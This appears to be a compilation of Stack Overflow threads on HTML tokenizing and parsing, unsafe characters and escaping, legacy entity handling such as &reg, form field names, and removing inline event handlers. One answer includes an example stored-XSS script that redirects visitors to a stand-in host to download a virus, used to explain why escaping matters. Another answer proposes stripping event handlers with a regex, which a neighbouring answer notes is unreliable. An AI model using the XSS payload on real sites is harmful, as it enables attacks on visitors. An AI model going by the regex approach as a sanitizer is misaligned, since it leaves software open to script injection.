How does a parser (for example, HTML) work?

For argument's sake, let's assume an HTML parser.
I've read that it tokenizes everything first, and then parses it.
What does tokenize mean?
Does the parser read each character, building up a multidimensional array to store the structure?
For example, does it read a < and then begin to capture the element, and then once it meets a closing > (outside of an attribute), push it onto an array stack somewhere?
I'm interested for the sake of knowing (I'm curious).
If I were to read through the source of something like HTML Purifier, would that give me a good idea of how HTML is parsed?

Tokenizing can be composed of a few steps, for example, if you have this html code:
<html>
<head>
<title>My HTML Page</title>
</head>
<body>
<p style="special">
This paragraph has special style
</p>
<p>
This paragraph is not special
</p>
</body>
</html>
the tokenizer may convert that string to a flat list of significant tokens, discarding whitespace (thanks, SasQ, for the correction):
["<", "html", ">",
"<", "head", ">",
"<", "title", ">", "My HTML Page", "</", "title", ">",
"</", "head", ">",
"<", "body", ">",
"<", "p", "style", "=", "\"", "special", "\"", ">",
"This paragraph has special style",
"</", "p", ">",
"<", "p", ">",
"This paragraph is not special",
"</", "p", ">",
"</", "body", ">",
"</", "html", ">"
]
there may be multiple tokenizing passes to convert the list of tokens into a list of even higher-level tokens, as the following hypothetical HTML parser might produce (still a flat list):
[("<html>", {}),
("<head>", {}),
("<title>", {}), "My HTML Page", "</title>",
"</head>",
("<body>", {}),
("<p>", {"style": "special"}),
"This paragraph has special style",
"</p>",
("<p>", {}),
"This paragraph is not special",
"</p>",
"</body>",
"</html>"
]
then the parser converts that list of tokens to form a tree or graph that represents the source text in a manner that is more convenient to access/manipulate by the program:
("<html>", {}, [
("<head>", {}, [
("<title>", {}, ["My HTML Page"]),
]),
("<body>", {}, [
("<p>", {"style": "special"}, ["This paragraph has special style"]),
("<p>", {}, ["This paragraph is not special"]),
]),
])
at this point, the parsing is complete; and it is then up to the user to interpret the tree, modify it, etc.
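To make that last step concrete, here is a minimal sketch in Python (token shapes and names are purely illustrative, not from any real parser) that folds the flat list of high-level tokens into the nested tuples shown above:
def build_tree(tokens):
    # ("<p>", {attrs}) opens an element, "</p>" closes one, strings are text
    root = ("<root>", {}, [])            # artificial root holding everything
    stack = [root]                       # stack of currently open elements
    for tok in tokens:
        if isinstance(tok, tuple):       # opening tag
            name, attrs = tok
            node = (name, attrs, [])
            stack[-1][2].append(node)    # attach to the enclosing element
            stack.append(node)           # and descend into it
        elif tok.startswith("</"):       # closing tag: climb back out
            stack.pop()
        else:                            # plain text content
            stack[-1][2].append(tok)
    return root[2][0]                    # the single top-level element
Feeding it the flat list above yields exactly the ("<html>", {}, [...]) tree shown.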

First of all, you should be aware that parsing HTML is particularly ugly -- HTML was in wide (and divergent) use before being standardized. This leads to all manner of ugliness, such as the standard specifying that some constructs aren't allowed, but then specifying required behavior for those constructs anyway.
Getting to your direct question: tokenization is roughly equivalent to taking English, and breaking it up into words. In English, most words are consecutive streams of letters, possibly including an apostrophe, hyphen, etc. Mostly words are surrounded by spaces, but a period, question mark, exclamation point, etc., can also signal the end of a word. Likewise for HTML (or whatever) you specify some rules about what can make up a token (word) in this language. The piece of code that breaks the input up into tokens is normally known as the lexer.
At least in a normal case, you do not break all the input up into tokens before you start parsing. Rather, the parser calls the lexer to get the next token when it needs one. When it's called, the lexer looks at enough of the input to find one token, delivers that to the parser, and no more of the input is tokenized until the next time the parser needs more input.
In a general way, you're right about how a parser works. A typical parser uses a stack during the act of parsing a statement, but what it builds to represent a statement is normally a tree (an Abstract Syntax Tree, aka AST), not a multidimensional array.
Based on the complexity of parsing HTML, I'd reserve looking at a parser for it until you've read through a few others first. If you do some looking around, you should be able to find a fair number of parsers/lexers for things like mathematical expressions that are probably more suitable as an introduction (smaller, simpler, easier to understand, etc.)
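Following that suggestion, here is a sketch of such an introductory parser in Python (all names invented for the example). Note how the parser pulls tokens from the lexer one at a time, the on-demand arrangement described above, and builds its AST out of nested tuples:
import re

TOKEN_RE = re.compile(r"\s*(?:(\d+)|(\S))")    # skip spaces; number or one char

def lex(text):
    # The lexer: yields one token at a time, on demand.
    for number, char in TOKEN_RE.findall(text):
        yield ("NUM", int(number)) if number else ("OP", char)
    while True:                                # report EOF forever
        yield ("EOF", None)

class Parser:
    def __init__(self, text):
        self.tokens = lex(text)
        self.current = next(self.tokens)       # one token of lookahead

    def eat(self):
        tok, self.current = self.current, next(self.tokens)
        return tok

    def parse_expr(self):                      # expr := term (('+'|'-') term)*
        node = self.parse_term()
        while self.current in (("OP", "+"), ("OP", "-")):
            op = self.eat()[1]
            node = (op, node, self.parse_term())   # AST node as a tuple
        return node

    def parse_term(self):                      # term := NUM
        kind, value = self.eat()
        assert kind == "NUM", "expected a number"
        return value

print(Parser("1 + 2 - 3").parse_expr())        # ('-', ('+', 1, 2), 3)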

Don't miss the W3C's notes on parsing HTML5.
For an interesting introduction to scanning/lexing, search the web for Efficient Generation of Table-Driven Scanners. It shows how scanning is ultimately driven by automata theory. A collection of regular expressions is transformed into a single NFA. The NFA is then transformed to a DFA to make state transitions deterministic. The paper then describes a method to transform the DFA into a transition table.
A key point: scanners use regular expression theory but likely don't use existing regular expression libraries. For better performance, state transitions are coded as giant case statements or in transition tables.
Scanners guarantee that correct words (tokens) are used. Parsers guarantee the words are used in the correct combination and order. Scanners use regular expression and automata theory. Parsers use grammar theory, especially context-free grammars.
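As a toy illustration of the transition-table idea (hand-written here; a real scanner generator would derive the table from regular expressions), consider this Python sketch that recognizes runs of digits and runs of letters:
TRANSITIONS = {
    ("start", "digit"):   "in_num",
    ("in_num", "digit"):  "in_num",
    ("start", "alpha"):   "in_name",
    ("in_name", "alpha"): "in_name",
}
ACCEPTING = {"in_num": "NUM", "in_name": "NAME"}

def char_class(c):
    return "digit" if c.isdigit() else "alpha" if c.isalpha() else "other"

def scan(text):
    i = 0
    while i < len(text):
        state, start = "start", i
        # follow transitions as far as the table allows (maximal munch)
        while i < len(text) and (state, char_class(text[i])) in TRANSITIONS:
            state = TRANSITIONS[(state, char_class(text[i]))]
            i += 1
        if state in ACCEPTING:
            yield (ACCEPTING[state], text[start:i])
        else:
            i += 1                      # skip characters the DFA rejects

print(list(scan("abc 123 x9")))
# [('NAME', 'abc'), ('NUM', '123'), ('NAME', 'x'), ('NUM', '9')]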
A couple parsing resources:
http://www.cs.utk.edu/~eijkhout/594-LaTeX/handouts/parsing/parsing-tutorial.pdf
http://cryptodrm.engr.uconn.edu/c244lect/L2.pdf

HTML and XML syntax (and others based on SGML) are quite hard to parse, and they don't fit well into the lexing scenario, because they're not regular. In parsing theory, a regular grammar is one that doesn't have any recursion, that is, no self-similar, nested patterns or parentheses-like wrappers which have to match each other. But HTML/XML/SGML-based languages do have nested patterns: tags can be nested. A syntax with nesting patterns is higher in the Chomsky classification: it's context-free or even context-sensitive.
But back to your question about lexer:
Each syntax consists of two kinds of symbols: non-terminal symbols (those which unwind into other syntax rules) and terminal symbols (those which are "atomic" - they are leaves of the syntax tree and don't unwind into anything else). Terminal symbols are often just the tokens. Tokens are pumped one by one from the lexer and matched to their corresponding terminal symbols.
Those terminal symbols (tokens) often have a regular syntax, which is easier to recognize (and that's why recognizing them is factored out to the lexer, which is specialized for regular grammars and can do the job faster than the more general machinery needed for non-regular grammars).
So, to write a lexer for an HTML/XML/SGML-like language, you need to find parts of the syntax which are atomic enough and regular, to be dealt with easily by the lexer. And here the problem arises, because it's not at first obvious which parts these are. I struggled with this problem for a long time.
But Lie Ryan above has done a very good job of recognizing these parts. Bravo! The token types are as follows:
TagOpener: < lexeme, used for starting tags.
TagCloser: > lexeme, used for ending tags.
ClosingTagMarker: / lexeme used in closing tags.
Name: alphanumeric sequence starting with a letter, used for tag names and attribute names.
Value: text which can contain a variety of different characters, spaces, etc. Used for the values of attributes.
Equals: = lexeme, used for separating attribute names from its values.
Quote: ' lexeme, used for enclosing attribute values.
DoubleQuote: " lexeme, used for enclosing attribute values.
PlainText: Any text not containing < character directly and not covered by the above types.
You can also have some tokens for entity references, like &nbsp; or &amp;. Probably:
EntityReference: a lexeme consisting of & followed by some alphanumeric characters and ended with ;.
Why did I use separate tokens for ' and " rather than one token for the attribute value? Because a regular syntax couldn't recognize which of these characters should end the sequence: it depends on the character which started it (the ending character has to match the starting character). This "parenthesizing" is considered non-regular syntax. So I promote it to a higher level, to the parser. It'd be its job to match these tokens (starting and ending) together (or to match none at all, for simple attribute values not containing spaces).
Afterthought:
Unfortunately, some of these tokens may occur only inside other markup. So the use of lexical contexts is needed, which is, after all, another state machine controlling the state machines recognizing particular tokens. And that's why I've said that SGML-like languages don't fit well into the schema of lexical analysis.
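For illustration, here is a rough Python sketch of that two-context arrangement, using the token types listed above (the patterns are simplified, and distinguishing Name from Value is left to the parser, per the quote discussion):
import re

TEXT_RULES = [("TagOpener", r"<"), ("EntityReference", r"&[A-Za-z0-9]+;"),
              ("PlainText", r"[^<&]+")]
TAG_RULES = [("TagCloser", r">"), ("ClosingTagMarker", r"/"),
             ("Equals", r"="), ("Quote", r"'"), ("DoubleQuote", r'"'),
             ("Name", r"[A-Za-z][A-Za-z0-9-]*"), ("Skip", r"\s+")]

def lex(html):
    mode, pos = TEXT_RULES, 0
    while pos < len(html):
        for name, pattern in mode:
            m = re.match(pattern, html[pos:])
            if m:
                if name != "Skip":
                    yield (name, m.group())
                if name == "TagOpener":
                    mode = TAG_RULES       # switch lexical context on <
                elif name == "TagCloser":
                    mode = TEXT_RULES      # and back on >
                pos += m.end()
                break
        else:
            raise SyntaxError(f"no token matches at position {pos}")

print(list(lex('<p style="special">hi</p>')))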

This is how the HTML5 parser works: [diagram omitted; the original answer reproduced the parsing-model overview from the HTML5 spec, in which bytes from the network pass through the tokenizer to the tree-construction stage, which builds the DOM]


Why are these 5 (6?) characters considered "unsafe" HTML characters?

In PHP, there is a function called htmlspecialchars() that performs the following substitutions on a string:
& (ampersand) is converted to &amp;
" (double quote) is converted to &quot;
' (single quote) is converted to &#039; (only if the flag ENT_QUOTES is set)
< (less than) is converted to &lt;
> (greater than) is converted to &gt;
Apparently, this is done on the grounds that these 5 specific characters are the unsafe HTML characters.
I can understand why the last two are considered unsafe: if they are simply "echoed", arbitrary/dangerous HTML could be delivered, including potential javascript with <script> and all that.
Question 1. Why are the first three characters (ampersand, double quote, single quote) also considered 'unsafe'?
Also, I stumbled upon this library called "he" on GitHub (by Mathias Bynens), which is about encoding/decoding HTML entities. There, I found the following:
[...] characters that are unsafe for use in HTML content (&, <, >, ", ', and `) will be encoded. [...]
(source)
Question 2. Is there a good reason for considering the backtick another unsafe HTML character? If yes, does this mean that PHP's function mentioned above is outdated?
Finally, all this begs the question:
Question 3. Are there any other characters that should be considered 'unsafe', alongside those 5/6 characters mentioned above?
Donovan_D's answer pretty much explains it, but I'll provide some examples here of how specifically these particular characters can cause problems.
Those characters are considered unsafe because they are the most obvious ways to perform an XSS (Cross-Site Scripting) attack (or break a page by accident with innocent input).
Consider a comment feature on a website. You submit a form with a textarea. It gets saved into the database, and then displayed on the page for all visitors.
Now I submit a comment that looks like this:
<script type="text/javascript">
window.top.location.href="http://www.someverybadsite.website/downloadVirus.exe";
</script>
And suddenly, everyone that visits your page is redirected to a virus download. The naive approach here is to say: okay, well then let's filter out some of the important characters in that attack:
< and > will be replaced with &lt; and &gt;, and now suddenly our script isn't a script. It's just some HTML-looking text.
A similar situation arises with a comment like
Something is <<wrong>> here.
Supposing a user used <<...>> to emphasize for some reason, their comment would render as
Something is <> here.
Obviously not desirable behavior.
A less malicious situation arises with &. & is used to denote HTML entities such as &amp; and &quot; and &lt; etc. So it's fairly easy for innocent-looking text to accidentally be an HTML entity and end up looking very different and very odd to a user.
Consider the comment
I really like #455 &#243; please let me know when they're available for purchase.
This would be rendered as
I really like #455 ó please let me know when they're available for purchase.
Obviously not intended behavior.
The point is, these symbols were identified as key to preventing most XSS vulnerabilities/bugs most of the time, since they are likely to appear in valid input but need to be escaped to render properly in HTML.
To your second question, I am personally unaware of any way that the backtick should be considered an unsafe HTML character.
As for your third, maybe. Don't rely on blacklists to filter user input. Instead, use a whitelist of known OK input and work from there.
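For the output-escaping half of the job (as opposed to sanitizing rich HTML input), most languages ship a helper covering exactly these characters; in Python, for example:
import html

# html.escape handles & < > always, and " ' when quote=True (the default).
comment = '<script>alert("pwned")</script>'
print(html.escape(comment))
# &lt;script&gt;alert(&quot;pwned&quot;)&lt;/script&gt;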
These chars are unsafe because in HTML < and > define a tag, " and ' are used to surround attribute values, and & is encoded because of its use in HTML entities. No other chars need to be encoded, but they can be. For example, the trade symbol can be written as &trade;, the US dollar sign as &dollar;, and the euro as &euro;; any emoji can likewise be produced with an HTML entity (a numeric character reference). You can find an explanation and examples here.

Why is "&reg" being rendered as "®" without the bounding semicolon

I've been running into a problem that was revealed through our Google adwords-driven marketing campaign. One of the standard parameters used is "region". When a user searches and clicks on a sponsored link, Google generates a long URL to track the click and sends a bunch of stuff along in the referrer. We capture this for our records, and we've noticed that the "Region" parameter is coming through incorrectly. What should be
http://ravercats.com/meow?foo=bar&region=catnip
is instead coming through as:
http://ravercats.com/meow?foo=bar®ion=catnip
I've verified that this occurs in all browsers. It's my understanding that HTML entity syntax is defined as follows:
&VALUE;
where the leading boundary is the ampersand and the closing boundary is the semicolon. Seems straightforward enough. The problem is that this isn't being respected for the &reg; entity, and it's wreaking all kinds of havoc throughout our system.
Does anyone know why this is occurring? Is it a bug in the DTD? (I'm looking for the current HTML DTD to see if I can make sense of it) I'm trying to figure out what would be common across browsers to make this happen, thus my looking for the DTD.
Here is a proof you can use. Take this code, make an HTML file out of it and render it in a browser:
<html>
http://foo.com/bar?foo=bar&region=US&register=lowpass&reg_test=fail&trademark=correct
</html>
EDIT: To everyone who's suggesting that I need to escape the entire URL, the example URLs above are exactly that, examples. The real URL is coming directly from Google and I have no control over how it is constructed. These suggestions, while valid, don't answer the question: "Why is this happening".
Although valid character references always have a semicolon at the end, some invalid named character references without a semicolon are, for backward compatibility reasons, recognized by modern browsers' HTML parsers.
Either you know what that entire list is, or you follow the HTML5 rules for when & is valid without being escaped (e.g. when followed by a space), or otherwise always escape & as &amp; whenever in doubt.
For reference, the full list of named character references that are recognized without a semicolon is:
AElig, AMP, Aacute, Acirc, Agrave, Aring, Atilde, Auml, COPY, Ccedil,
ETH, Eacute, Ecirc, Egrave, Euml, GT, Iacute, Icirc, Igrave, Iuml, LT,
Ntilde, Oacute, Ocirc, Ograve, Oslash, Otilde, Ouml, QUOT, REG, THORN,
Uacute, Ucirc, Ugrave, Uuml, Yacute, aacute, acirc, acute, aelig,
agrave, amp, aring, atilde, auml, brvbar, ccedil, cedil, cent, copy,
curren, deg, divide, eacute, ecirc, egrave, eth, euml, frac12, frac14,
frac34, gt, iacute, icirc, iexcl, igrave, iquest, iuml, laquo, lt,
macr, micro, middot, nbsp, not, ntilde, oacute, ocirc, ograve, ordf,
ordm, oslash, otilde, ouml, para, plusmn, pound, quot, raquo, reg,
sect, shy, sup1, sup2, sup3, szlig, thorn, times, uacute, ucirc,
ugrave, uml, uuml, yacute, yen, yuml
However, it should be noted that, when in an attribute value, named character references in the above list are not processed as such by conforming HTML5 parsers if the next character is a = or an alphanumeric ASCII character.
For the full list of named character references with or without ending semicolons, see here.
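If you would rather not maintain that list by hand, it can be recovered programmatically. Python's html.entities.html5 table, for instance, stores the legacy names both with and without the trailing semicolon, so the semicolon-less keys are exactly this list:
from html.entities import html5

legacy = sorted(name for name in html5 if not name.endswith(";"))
print(len(legacy))     # should print 106, the size of the list above
print(legacy[:5])      # ['AElig', 'AMP', 'Aacute', 'Acirc', 'Agrave']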
This is a very messy business and depends on context (text content vs. attribute value).
Formally, by HTML specs up to and including HTML 4.01, an entity reference may appear without the trailing semicolon if the next character is not a name character. So e.g. &region= would be syntactically correct but undefined, as the entity region has not been defined. XHTML makes the trailing semicolon required.
Browsers have traditionally played by other rules, though. Due to the common syntax of query URLs, they parse e.g. href="http://ravercats.com/meow?foo=bar&region=catnip" so that &region is not treated as an entity reference but as just text data. And authors mostly used such constructs, even though they are formally incorrect.
Contrary to what the question seems to be saying, href="http://ravercats.com/meow?foo=bar&region=catnip" actually works well. Problems arise when the string is not in an attribute value but inside text content, which is rather uncommon: we don’t normally write URLs in text. In text, &region= gets processed so that &reg is recognized as an entity reference (for “®”) and the rest is just character data. Such odd behavior is being made official in HTML5 CR, where clause 8.2.4.69 Tokenizing character references describes the “double standard”:
If the character reference is being consumed as part of an attribute,
and the last character matched is not a ";" (U+003B) character, and
the next character is either a "=" (U+003D) character or in the range
ASCII digits, uppercase ASCII letters, or lowercase ASCII letters,
then, for historical reasons, all the characters that were matched
after the U+0026 AMPERSAND character (&) must be unconsumed, and
nothing is returned.
Thus, in an attribute value, even &reg= would not be treated as containing a character reference, and still less &region=. (But reg_test= is a different case, due to the underscore character.)
In text content, other rules apply. The construct &region= causes then a parse error (by HTML5 CR rules), but with well-defined error handling: &reg is recognized as a character reference.
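You can reproduce the text-content behavior with any HTML5-conformant decoder. Python's html.unescape, for example, applies exactly these rules (legacy semicolon-less references included); run against the "proof" URL from the question, it shows which names trigger:
import html

url = "http://foo.com/bar?foo=bar&region=US&register=lowpass&reg_test=fail&trademark=correct"
print(html.unescape(url))
# http://foo.com/bar?foo=bar®ion=US®ister=lowpass®_test=fail&trademark=correct
# &reg matches as the longest known prefix of region/register/reg_test, while
# &trademark survives: trade is not on the legacy list, it needs a semicolon.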
Maybe try replacing your & with &amp;? Ampersands are characters that must be escaped in HTML as well, because they are reserved for use as parts of entities.
1: The following markup is invalid in the first place (use the W3C Markup Validation Service to verify):
<a href="http://ravercats.com/meow?foo=bar&region=catnip">meow</a>
In the above example, the & character should be encoded as &amp;, like so:
<a href="http://ravercats.com/meow?foo=bar&amp;region=catnip">meow</a>
2: Browsers are tolerant; they try to make sense out of broken HTML. In your case, anything that looks like a valid HTML entity gets decoded as one.
Here is a simple solution, though it may not work in all instances: reorder the query-string parameters so that "region" comes first and never follows an ampersand.
So from this:
http://ravercats.com/meow?status=Online&region=Atlantis
To This:
http://ravercats.com/meow?region=Atlantis&status=Online
Because &reg, as we know, triggers the special character ®.
Caveat: If you have no control over the order of your URL query string parameters then you'll have to change your variable name to something else.
Escape your output!
Simply enough, you need to encode the URL format into HTML format for accurate representation (ideally you would do so with a template engine's variable-escaping function, but barring that, with htmlspecialchars($url) or htmlentities($url) in PHP).
See your test case and then the correctly encoded html at this jsfiddle:
http://jsfiddle.net/tchalvakspam/Fp3W6/
Inactive code here:
<div>
Unescaped:
<br>
http://foo.com/bar?foo=bar&region=US&register=lowpass&reg_test=fail&trademark=correct
</div>
<div>
Correctly escaped:
<br>
http://foo.com/bar?foo=bar&amp;region=US&amp;register=lowpass&amp;reg_test=fail&amp;trademark=correct
</div>
It seems to me that what you have received from Google is not an actual URL but a variable which refers to a URL (a query string). So that's why it's being parsed as a registered-trademark sign when rendered.
I would say you ought to URL-encode it, and decode it whenever processing it, like any other variable containing special entities.
To prevent this from happening you should encode your URLs, which replaces characters like the ampersand with a % followed by a hexadecimal number.
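For instance (a Python sketch), percent-encoding a parameter value before it is pasted into a URL turns its ampersand into %26, so it can no longer be taken for a parameter separator or the start of an entity:
from urllib.parse import quote

value = "cat&nip"
print("http://ravercats.com/meow?region=" + quote(value, safe=""))
# http://ravercats.com/meow?region=cat%26nip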

What characters are allowed in the HTML Name attribute inside input tag?

I have a PHP script that will generate <input>s dynamically, so I was wondering if I needed to filter any characters in the name attribute.
I know that the name has to start with a letter, but I don't know any other rules. I figure square brackets must be allowed, since PHP uses these to create arrays from form data. How about parentheses? Spaces?
Note that not all characters are submitted for name attributes of form fields (even when using POST)!
Leading and trailing white-space characters are trimmed, and inner white-space characters as well as the character . are replaced by _.
(Tested in Chrome 23, Firefox 13 and Internet Explorer 9, all Win7.)
Any character you can include in an [X]HTML file is fine to put in an <input name>. As Allain's comment says, <input name> is defined as containing CDATA, so the only things you can't put in there are the control codes and invalid codepoints that the underlying standard (SGML or XML) disallows.
Allain quoted W3 from the HTML4 spec:
Note. The "get" method restricts form data set values to ASCII characters. Only the "post" method (with enctype="multipart/form-data") is specified to cover the entire ISO10646 character set.
However this isn't really true in practice.
The theory is that application/x-www-form-urlencoded data doesn't have a mechanism to specify an encoding for the form's names or values, so using non-ASCII characters in either is “not specified” as working and you should use POSTed multipart/form-data instead.
Unfortunately, in the real world, no browser specifies an encoding for fields even when it theoretically could, in the subpart headers of a multipart/form-data POST request body. (I believe Mozilla tried to implement it once, but backed out as it broke servers.)
And no browser implements the astonishingly complex and ugly RFC2231 standard that would be necessary to insert encoded non-ASCII field names into the multipart's subpart headers. In any case, the HTML spec that defines multipart/form-data doesn't directly say that RFC2231 should be used, and, again, it would break servers if you tried.
So the reality of the situation is there is no way to know what encoding is being used for the names and values in a form submission, no matter what type of form it is. What browsers will do with field names and values that contain non-ASCII characters is the same for GET and both types of POST form: it encodes them using the encoding the page containing the form used. Non-ASCII GET form names are no more broken than everything else.
DLH:
So name has a different data type for <input> than it does for other elements?
Actually the only element whose name attribute is not CDATA is <meta>. See the HTML4 spec's attribute list for all the different uses of name; it's an overloaded attribute name, having many different meanings on the different elements. This is generally considered a bad thing.
However, typically these days you would avoid name except on form fields (where it's a control name) and param (where it's a plugin-specific parameter identifier). That's only two meanings to grapple with. The old-school use of name for identifying elements like <form> or <a> on the page should be avoided (use id instead).
The only real restriction on what characters can appear in form control names is when a form is submitted with GET
"The "get" method restricts form data set values to ASCII characters." reference
There's a good thread on it here.
While Allain's comment did answer the OP's direct question and bobince provided some brilliant in-depth information, I believe many people come here seeking the answer to a more specific question: "Can I use a dot character in a form input's name attribute?"
As this thread came up as first result when I searched for this knowledge I guessed I may as well share what I found.
Firstly, Matthias claimed that:
character . are replaced by _
This is untrue. I don't know if browsers actually did this kind of operation back in 2013; though, I doubt that. Browsers send dot characters as they are (talking about POST data)! You can check it in the developer tools of any decent browser.
Please notice that tiny comment by abluejelly, which is probably missed by many:
I'd like to note that this is a server-specific thing, not a browser thing. Tested on Win7 FF3/3.5/31, IE5/7/8/9/10/Edge, Chrome39, and Safari Windows 5, and all of them sent " test this.stuff" (four leading spaces) as the name in POST to the ASP.NET dev server bundled with VS2012.
I checked it with the Apache HTTP server (v2.4.25), and indeed an input name like "foo.bar" is changed to "foo_bar". But in a name like "foo[foo.bar]" that dot is not replaced by _!
My conclusion: you can use dots, but I wouldn't, as this may lead to some unexpected behaviour depending on the server stack used.
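To see where the renaming happens, compare against a neutral parser of the raw request body (a Python sketch). The browser transmits the dot untouched; it is the receiving stack that rewrites it (PHP, for example, is known to turn dots and spaces in incoming variable names into underscores):
from urllib.parse import parse_qs

body = "foo.bar=1&foo%5Bfoo.bar%5D=2"   # a POST body as sent on the wire
print(parse_qs(body))
# {'foo.bar': ['1'], 'foo[foo.bar]': ['2']}  -- dots intact at this level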
Do you mean the id and name attributes of the HTML input tag?
If so, I'd be very tempted to restrict (or convert) allowed "input" name characters into only a-z (A-Z), 0-9 and a limited range of punctuation (".", ",", etc.), if only to limit the potential for XSS exploits, etc.
Additionally, why let the user control any aspect of the input tag? (Might it not ultimately be easier from a validation perspective to keep the input tag names as 'custom_1', 'custom_2', etc. and then map these as required?)

What's the HTML character entity for the # sign?

What's the HTML character entity for the # sign? I've looked around for "pound" (which keeps returning the currency), and "hash" and "number", but what I try doesn't seem to turn into the right character.
You can search for the individual character at fileformat.info. Enter # as the search string and the 1st hit will lead you to U+0023. Scroll down a bit to the 2nd table, Encodings, and you'll see the following entries:
HTML Entity (decimal) &#35;
HTML Entity (hex) &#x23;
For # we have &num;.
Bear in mind, though, it is a new entity (IE9 can't recognize it, for instance). For wide support, you'll have to resort, as others have said, to the numerical references &#35; and, in hex, &#x23;.
If you need to find out others, there are some very useful tools around.
The "#" -- like most Unicode characters -- has no particular name assigned to it in the W3 list of
"Character entity references"
http://www.w3.org/TR/html4/sgml/entities.html
.
So in HTML it is either represented by itself as "#" or a numeric character entity "#" or "#" (without quotes), as described in
"HTML Document Representation"
http://www.w3.org/TR/html4/charset.html
.
Alas, all three of these are useless for escaping it in a URL.
To transmit a "#" character to the web server in a URL, you want to use "URL encoding" aka "percent encoding" as described in RFC 3986, and replace each "#" with a "%23" (without quotes).
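In Python, for instance, the standard quoting helper does exactly this:
from urllib.parse import quote

# '#' becomes %23, so it reaches the server instead of starting a fragment:
print(quote("see item #42", safe=""))   # see%20item%20%2342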
There is no HTML character entity for the # character, as the character has no special meaning in HTML.
You have to use a numeric character reference like &#35; if you wish to HTML-encode it for some reason.
&#35; or &#x23;
http://www.asciitable.com/ has information. Wikipedia also has pages for most unicode characters.
http://en.wikipedia.org/wiki/Number_sign
The numerical reference is &#35;.
You can display "#" in some ways as shown below:
&num; or &#35; or &#x23;
In addition, you can display "♯" (which is different from "#") in some ways as shown below:
&#9839; or &#x266F; or &sharp;
We've got some wild answers here, and actually we might have to split hairs to determine whether it qualifies as an HTML entity, but what I believe you're looking for is the named anchor.
This allows references to different sections within an HTML document via hyperlink, and it specifically uses the octothorpe (hash symbol, number symbol, pound symbol):
exampleDomain.com/exampleSilo/examplePage.html#2ndBase
would be an example of how it's used.
&num; is the best option because it is the only one that doesn't include the # (hash) in it. Supported by old browsers or not, it is the best practice going forward.
(What is the point of encoding something using the same symbol you are encoding?)

Cleaning all inline events from HTML tags

For HTML input, I want to neutralize all HTML elements that have inline js (onclick="..", onmouseout=".." etc).
I am thinking: isn't it enough to encode the following chars: =, (, )?
So onclick="location.href='ggg.com'"
will become
onclick%3D"location.href%3D'ggg.com'"
What am I missing here?
Edit: I do need to accept active HTML (I can't escape it all or convert it all to entities).
There's no simple method to accept HTML, but not scripts.
You have to parse HTML to DOM, remove all unwanted elements and attributes in DOM and generate new HTML.
It can't be done reliably with regular expressions.
on* attributes are not enough. Scripts can be embedded in style, src, href and other attributes.
If you're using PHP, then use HTML Purifier.
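To illustrate the parse-and-rebuild approach in miniature, here is a Python sketch with an invented whitelist (HTML Purifier does the same job far more thoroughly): only listed tags and attributes are re-emitted, so on* handlers and script elements simply never survive.
from html.parser import HTMLParser
import html

ALLOWED_TAGS = {"p", "b", "i", "a"}
ALLOWED_ATTRS = {"a": {"href"}}

class Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__()
        self.out, self.skip = [], 0      # skip counts open <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip += 1
        elif tag in ALLOWED_TAGS:
            kept = "".join(
                f' {name}="{html.escape(value or "")}"'
                for name, value in attrs
                if name in ALLOWED_ATTRS.get(tag, set())
                and not (value or "").strip().lower().startswith("javascript:"))
            self.out.append(f"<{tag}{kept}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip -= 1
        elif tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(html.escape(data))

s = Sanitizer()
s.feed('<p onclick="evil()">hi <a href="x">go</a><script>bad()</script></p>')
print("".join(s.out))    # <p>hi <a href="x">go</a></p>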
You probably have a couple of options... the easiest way is to convert quotes, and possibly <> characters, to their HTML-encoded equivalents (&quot; etc.), which will result in the HTML code being displayed literally.
Tell me what server-side language you are using and I can point you towards more language-specific information, if you like. (For example, PHP has htmlspecialchars()[1].)
EDIT: I just actually read your question. Okay, you want to allow HTML through but no JavaScript? Well, for lack of a simple solution jumping to my mind, I suggest just using string replacement (regular expressions if you can, maybe?) to get rid of them entirely.
There is a finite set of event handler attributes in JavaScript. Couple that with the need for quotation marks and you're probably good.
For proof of concept, in Perl, you'd probably do something like this:
$myInput =~ s/on(mouseover|mouseout|click|focus|blur|[...])\s*=\s*("[^"]*"|'[^']*')\s*//gi;
So, capture the event handler name (only some of which I included), then a quoted expression using either single or double quotes, have optional whitespace on the end, and replace the entire thing with nothing (i.e., delete it).
That won't work for something requiring more levels of quotation, though, since eventually you would come back to the original delimiters. Forgive the contrived and completely useless example:
onclick="eval('3+prompt("Enter a number: ")')"
In THAT case, you might want to write a loop that parses the string first by word (i.e., looking for the event handler name), then going character by character, keeping track of the number of quoting levels as you go and keeping track of the current delimiter:
Mark the index of the beginning of the handler name (the "o" in onclick, etc.)
Start with quoting level 0 (or 1 after you've processed the opening quotation delimiter).
If the current delimiter is " and you see ', then increase the quoting level by 1 and switch the current delimiter to '.
If the current delimiter is " and you see another ", decrease the quoting level by 1 and switch the current delimiter back to the previous one.
If the current delimiter is ' and you see ", then increase the quoting level by 1 and switch the current delimiter to ".
If the current delimiter is ' and you see another ', decrease the quoting level by 1 and switch the current delimiter back to the previous one.
If the quoting level gets back down to 0, then your string has ended. Mark the index of where the string ends.
Use a string manipulation function to cut out the substring from the first index to the last index.
It's a little more time-consuming, but it should theoretically work no matter what, assuming the HTML is well-formed. (That's a horrible assumption, but if it's not well-formed you could just reject the input anyway!)
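Here is that loop transcribed into Python (a sketch of the scheme just described, with an invented helper name; not production-grade sanitizing):
import re

def strip_handlers(markup):
    out, i = [], 0
    while i < len(markup):
        m = re.match(r"on\w+\s*=\s*", markup[i:])
        j = i + m.end() if m else 0
        if not m or j >= len(markup) or markup[j] not in "\"'":
            out.append(markup[i])
            i += 1
            continue
        stack = [markup[j]]              # the opening delimiter
        j += 1
        while j < len(markup) and stack:
            c = markup[j]
            if c == stack[-1]:
                stack.pop()              # quoting level decreases
            elif c in "\"'":
                stack.append(c)          # quoting level increases
            j += 1
        i = j                            # cut the whole handler out
    return "".join(out)

page = '<a href="x" onclick="eval(\'3+prompt("n: ")\')">go</a>'
print(strip_handlers(page))              # <a href="x" >go</a>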
[1] http://us3.php.net/manual/en/function.htmlspecialchars.php